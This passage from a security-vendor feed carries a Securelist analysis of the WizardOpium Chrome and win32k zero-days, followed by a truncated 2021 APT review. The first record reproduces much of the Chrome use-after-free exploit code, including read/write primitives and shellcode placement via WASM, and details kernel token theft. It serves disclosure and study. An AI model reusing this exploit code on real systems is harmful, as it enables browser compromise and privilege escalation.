_initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0****, **it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc _and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation._", "cvss3": {}, "published": "2020-05-28T10:00:09", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "modified": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T10:36:53", "description": "\n\nIn the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters; you can find our quarterly overviews [here](<https://securelist.com/apt-trends-report-q1-2021/101967/>), [here](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [here](<https://securelist.com/apt-trends-report-q3-2021/104708/>)[.](<https://securelist.com/apt-trends-report-q3-2021/104708/>) For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape and it's important to note that no single vendor has complete visibility into the activities of all threat actors.\n\n## Private sector vendors play a significant role in the threat landscape\n\nPossibly the biggest story of 2021, an investigation by the Guardian and 16 other media organizations, published in July, suggested that over 30,000 human rights activists, journalists and lawyers across the world may have been targeted using Pegasus. The report, called [Pegasus Project](<https://www.amnesty.org/en/latest/press-release/2021/07/the-pegasus-project/>), alleged that the software uses a variety of exploits, including several iOS zero-click zero-days. Based on forensic analysis of numerous mobile devices, Amnesty International's Security Lab found that the software was repeatedly used in an abusive manner for surveillance. The list of targeted individuals includes 14 world leaders. Later that month, [representatives from the Israeli government visited the offices of NSO](<https://www.theguardian.com/news/2021/jul/29/israeli-authorities-inspect-nso-group-offices-after-pegasus-revelations>) as part of an investigation into the claims. And in October, India's Supreme Court commissioned a technical committee [to investigate whether the government had used Pegasus to spy on its citizens](<https://www.theregister.com/2021/10/29/india_nso_pegasus_probe/>). In November, Apple announced that it was taking [legal action against NSO Group](<https://www.theguardian.com/technology/2021/nov/23/apple-sues-israeli-cyber-firm-nso-group>) for developing software that targets its users with "malicious malware and spyware".\n\nDetecting infection traces from Pegasus and other advanced mobile malware is very tricky, and complicated by the security features of modern OSs such as iOS and Android. Based on our observations, this is further complicated by the deployment of non-persistent malware, which leaves almost no traces after reboot. Since many forensics frameworks require a device jailbreak, this results in the malware being removed from memory during the reboot. Currently, several methods can be used for detection of Pegasus and other mobile malware. [MVT (Mobile Verification Toolkit](<https://github.com/mvt-project/mvt>)) from Amnesty International is free, open source and allows technologists and investigators to inspect mobile phones for signs of infection. MVT is further boosted by a list of IoCs (indicators of compromise) collected from high profile cases and made available by Amnesty International.\n\n## Supply-chain attacks\n\nThere have been a number of high-profile supply-chain attacks in the last 12 months. Last December, it was reported that SolarWinds, a well-known IT managed services provider, had fallen victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor named Sunburst on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nNot all supply-chain attacks have been that sophisticated. Early this year, an APT group that we track as BountyGlad compromised a certificate authority in Mongolia and replaced the digital certificate management client software with a malicious downloader. Related infrastructure was identified and used in multiple other incidents: this included server-side attacks on WebSphere and WebLogic services in Hong Kong, and Trojanized Flash Player installers on the client side.\n\nWhile investigating the artefacts of a supply-chain attack on an Asian government Certification Authority's website, we discovered a Trojanized package that dates back to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins that were deployed using PhantomNet malware, which were in turn delivered using the aforementioned Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware.\n\nIn April 2021, Codecov, provider of code coverage solutions, publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between January 31 and April 1. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports and send the results to the Codecov infrastructure. This script compromise effectively constitutes a supply-chain attack.\n\nEarlier this year we discovered [Lazarus group](<https://securelist.com/tag/lazarus/>) campaigns using an updated DeathNote cluster. Our investigation revealed indications that point to Lazarus building supply-chain attack capabilities. In one case we found that the infection chain stemmed from legitimate South Korean security software executing a malicious payload; and in the second case, the target was a company developing asset monitoring solutions, an atypical victim for Lazarus. As part of the infection chain, Lazarus used a downloader named Racket, which they signed using a stolen certificate. The actor compromised vulnerable web servers and uploaded several scripts to filter and control the malicious implants on successfully breached victim machines.\n\nA previously unknown, suspected Chinese-speaking APT modified a fingerprint scanner software installer package on a distribution server in a country in East Asia. The APT modified a configuration file and added a DLL with a .NET version of a PlugX injector to the installer package. Employees of the central government in this country are required to use this biometric package to track attendance. We refer to this supply-chain incident and this particular PlugX variant as SmudgeX. The Trojanized installer appears to have been staged on the distribution server from March through June.\n\n## Exploiting vulnerabilities\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits had become available to multiple groups.\n\nWe also discovered a campaign active since mid-March targeting governmental entities in Europe and Asia using the same Exchange zero-day exploits. This campaign made use of a previously unknown malware family that we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced a state-sponsored threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog where a Chrome exploit was waiting for them. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We confirmed that several infrastructures on the blog overlapped with [our previously published](<https://securelist.com/lazarus-threatneedle/100803/>) reporting about Lazarus group's ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data related to the attack. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research.\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Further analysis revealed that this escalation of privilege (EoP) exploit had potentially been used in the wild since at least November 2020. We reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310. Various marks and artifacts left in the exploit meant that we were highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as Moses. Moses appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from Moses. While the EoP exploit was discovered in the wild, we weren't able to directly tie its usage to any known threat actor that we currently track. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an EoP exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 \u2013 RS5, 18362 \u2013 19H1, 18363 \u2013 19H2, 19041 \u2013 20H1, 19042 \u2013 20H2) and exploited two distinct vulnerabilities in the Microsoft Windows OS kernel. We reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8 as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a remote shell-style backdoor that in turn connects to the C2 to get commands. Because we couldn't find any connections or overlaps with a known actor, we named this cluster of activity PuzzleMaker.\n\nFinally, late this year, we detected a wave of attacks using an elevation of privilege exploit affecting server variants of the Windows operating system. Upon closer analysis, it turned out to be a zero-day use-after-free vulnerability in Win32k.sys that we reported to Microsoft and was consequently fixed as CVE-2021-40449. We analyzed the associated malware, dubbed the associated cluster MysterySnail and found infrastructure overlaps that link it to the IronHusky APT.\n\n## Firmware vulnerabilities\n\nIn September, we [provided an overview](<https://securelist.com/finspy-unseen-findings/104322/>) of the FinSpy PC implant, covering not only the Windows version, but also Linux and macOS versions. FinSpy is an infamous, commercial surveillance toolset that is used for "legal surveillance" purposes. Historically, several NGOs have repeatedly reported it being used against journalists, political dissidents and human rights activists. Historically, its Windows implant was represented by a single-stage spyware installer; and this version was detected and researched several times up to 2018. Since then, we have observed a decreasing detection rate for FinSpy for Windows. While the nature of this anomaly remained unknown, we began detecting some suspicious installer packages backdoored with Metasploit stagers. We were unable to attribute these packages to any threat actor until the middle of 2019 when we found a host that served these installers among FinSpy Mobile implants for Android. Over the course of our investigation, we found out that the backdoored installers are nothing more than first stage implants that are used to download and deploy further payloads before the actual FinSpy Trojan. Apart from the Trojanized installers, we also observed 